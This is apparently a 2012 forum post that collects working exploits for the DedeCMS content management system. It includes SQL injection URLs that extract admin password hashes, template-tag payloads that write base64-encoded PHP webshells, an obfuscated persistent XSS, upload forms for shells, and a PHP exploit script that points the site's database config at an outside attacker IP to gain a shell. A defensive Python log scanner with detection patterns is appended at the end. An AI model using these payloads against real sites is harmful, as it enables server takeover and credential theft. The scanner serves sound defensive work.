DedeCMS vulnerability summary

Posted on 2012-10-18 10:42:14
DedeCMS 5.6 RSS injection vulnerability
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1

DedeCMS v5.6 embedded malicious code execution vulnerability
Register as a member, upload software: in the "local address" field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the entry executes the code.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This generates x.php with password xiao, a one-line webshell.

DedeCMS 5.6 GBK SQL injection vulnerability
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

DedeCMS V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`

DEDECMS (all versions) gotopage variable XSS vulnerability
1. Copy and paste the URL below and visit it; this triggers the XSS and installs the XSS rootkit. Note that IE8/9 and similar browsers block URL-type XSS, so the XSS filter must be turned off.
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
2. Close the browser; however you then visit any of the URLs below, our XSS is triggered.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
http://v57.demo.dedecms.com/dede/login.php

DeDeCMS (织梦) variable overwrite getshell
#!usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.com www.webvul.com
');
echo "\r\n";
if($argv[2]==null){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
if (strpos($exp,"OK")>12){
echo "Exploit Success \n";
if($aid==1)echo "Shell:".$url."/$path/data/cache/fuck.php\n" ;
if($aid==2)echo "Shell:".$url."/$path/fuck.php\n" ;
if($aid==3)echo "Shell:".$url."/$path/plus/fuck.php\n";
}else{
echo "Exploit Failed \n";
}
function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
$port="80";
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "No response from ".$host."\n";
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
}
}
?>

DedeCMS v5.6-5.7 unauthorized access vulnerability (direct entry into the admin backend)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
Change validate=dcug above to the current captcha value and you enter the site backend directly.
The precondition for this vulnerability is that the backend path must be known.

DedeCMS (织梦) tag remote file write vulnerability
Precondition: you must have your own dede database ready, then insert this row: insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
Then submit with the form below; the shell is 1.php in the same directory. Work out the principle yourself...
<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>

DedeCMS <= V5.6 Final template execution vulnerability
1. Register a user, log into the member backend, publish an article and upload an image, then in attachment management replace the image with our crafted template; for example the image name is:
uploads/userup/2/12OMX04-15A.jpg
The template content is (if the image format is restricted, prepend gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just published, view the page source, and construct a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />

<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>

<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>

<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)

<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>

<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)

<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>

<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)

<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>

<input type='text' name='templet'
value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields'
value="templet,htmltext;">(constructed here)
</div>

<!-- form action area -->
<h3 class="meTitle">详细内容</h3>

<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>

<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />

<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>

</div>

</form>

Submit; if it reports that the edit succeeded, we have successfully changed the template path.
3. Visit the edited article:
Assuming the aid of the article just edited is 2, we only need to visit:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is generated in the plus directory.

DEDECMS site management system Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save as 1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>

Construct the form above; after upload the image is saved as /uploads/userup/3/1.gif
Publish an article, then construct the edit form as follows:

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>

织梦 (DedeCMS) V5.6 remote file deletion vulnerability
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

织梦 (DedeCMS) V5.6 plus/carbuyaction.php local file inclusion vulnerability
http://www.test.com/plus/carbuya ... urn&code=../../

DedeCMS V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The password is the 32-character MD5 with the first 5 and the last 7 characters removed, giving a 20-character MD5 password; to recover it, remove 3 more from the front and 1 from the end, giving a 16-character MD5.

织梦 (DedeCMS) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

织梦 (DedeCMS) select_soft_post.php page uninitialized variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>

织梦 (DedeCMS) 5.3 – 5.5 plus/digg_frame.php injection vulnerability
It exploits a MySQL numeric field overflow that raises an error, combined with DedeCMS recording database error messages into a PHP file whose header is not validated.
1. Visit the URL:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
The error message can be seen.
2. Visit
http://www.abc.com/data/mysql_error_trace.php and seeing the following information proves the injection succeeded.
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
3. Run the file test.html from dede.rar; note that the action address in the form is
<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">
After pressing OK, seeing the information from step 2 indicates the trojan file was uploaded successfully.

织梦 (DedeCMS) plus/infosearch.php file injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
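As an added defender's example that is not part of the original post: a small Python access-log scanner for the request signatures this post collects (cfg_* overwrite via GLOBALS, raw sql= on advancedsearch.php, mysql_error_trace.php reads, the edit_face.php traversal, gotopage script injection, union/updatexml probes against the admin table). The log lines, IP addresses and rule names below are constructed; the scanner only sees the request line, so payloads carried in POST bodies or a Cookie header (the mytag_js.php form above) need full-request logging or a WAF to be caught.

```python
import re
from urllib.parse import unquote_plus

# Request-line signatures derived from the exploit URLs collected in the post above.
# Each regex is applied to the percent-decoded path+query of one access-log entry.
RULES = {
    # cfg_* overwrite via $_COOKIE/$_POST/$_GET['GLOBALS'] (mytag_js.php, login.php)
    "globals_overwrite": re.compile(r"(?:_COOKIE|_POST|_GET|_REQUEST)\[GLOBALS\]\[cfg_", re.I),
    # raw SQL passed to plus/advancedsearch.php through the sql parameter
    "raw_sql_param": re.compile(r"/plus/advancedsearch\.php\?(?:.*&)?sql=", re.I),
    # reads of the error log that digg_frame.php abuse turns into a PHP file
    "mysql_error_trace": re.compile(r"/data/mysql_error_trace\.php", re.I),
    # reflected script in the login.php gotopage parameter
    "gotopage_script": re.compile(r"gotopage=\S*<script", re.I),
    # edit_face.php delold with path traversal in oldface
    "traversal_delete": re.compile(r"edit_face\.php\?(?=.*dopost=delold)(?=.*\.\./)", re.I),
    # union/updatexml probes or direct references to the admin table
    "sqli_probe": re.compile(r"updatexml\s*\(|\bunion\s+select\b|dede_admin|#@__admin", re.I),
    # DedeCMS template tags smuggled through the query string (toby57-style payloads)
    "dede_tag_in_url": re.compile(r"\{/?dede:", re.I),
}

# Combined-log-format request line: ip ident user [time] "METHOD PATH PROTO" status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')


def classify_request(path):
    """Return the sorted names of every rule that matches the decoded request path."""
    decoded = unquote_plus(path)
    return sorted(name for name, rx in RULES.items() if rx.search(decoded))


def scan_log(lines):
    """Return (ip, method, path, status, rules) for each log line that hits a rule.

    Only the request line is inspected: payloads carried in POST bodies or in a
    Cookie header are invisible here and need full-request logging or a WAF.
    """
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a production scanner should count these
        ip, _ts, method, path, status = m.groups()
        rules = classify_request(path)
        if rules:
            hits.append((ip, method, path, status, rules))
    return hits


# Constructed sample log (documentation-range IPs); the paths mirror the post's URLs.
SAMPLE_LOG = """\
203.0.113.10 - - [18/Oct/2012:10:42:14 +0800] "GET /plus/view.php?aid=2 HTTP/1.1" 200 5120
203.0.113.11 - - [18/Oct/2012:10:43:01 +0800] "GET /dede/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST%5BGLOBALS%5D%5Bcfg_dbhost%5D=203.0.113.99 HTTP/1.1" 302 0
203.0.113.11 - - [18/Oct/2012:10:43:20 +0800] "GET /plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20%60%23@__admin%60 HTTP/1.1" 200 880
203.0.113.12 - - [18/Oct/2012:10:44:05 +0800] "GET /data/mysql_error_trace.php HTTP/1.1" 200 310
203.0.113.12 - - [18/Oct/2012:10:44:40 +0800] "GET /member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif HTTP/1.1" 200 0
203.0.113.13 - - [18/Oct/2012:10:45:12 +0800] "GET /plus/feedback_js.php?arcurl='%20union%20select%201,2,userid,4,pwd%20from%20dede_admin HTTP/1.1" 200 120
"""

if __name__ == "__main__":
    for ip, method, path, status, rules in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{ip} {method} {status} {','.join(rules)} {path[:60]}")
```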